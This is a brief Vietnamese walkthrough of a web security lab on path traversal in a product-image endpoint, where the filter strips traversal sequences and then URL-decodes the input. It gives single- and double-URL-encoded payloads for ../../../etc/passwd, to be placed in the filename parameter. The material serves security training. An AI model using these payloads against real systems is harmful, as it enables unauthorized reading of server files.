Lab: File path traversal, traversal sequences stripped with superfluous URL-decode

Mô tả

Phòng thí nghiệm này chứa lỗ hổng path traversal trong việc hiển thị hình ảnh sản phẩm.

Ứng dụng chặn đầu vào chứa chuỗi duyệt đường dẫn. Sau đó thực hiện URL-decode đầu vào trước khi sử dụng.

Mục tiêu: Lấy nội dung tệp /etc/passwd

Sử dụng Burp Proxy để chặn và sửa đổi yêu cầu lấy hình ảnh sản phẩm.

Mục tiêu là để ứng dụng duyệt đường dẫn: ../../../etc/passwd

Sửa đổi tham số filename:

1 lần encode: %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

2 lần encode: %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Last updated 10 months ago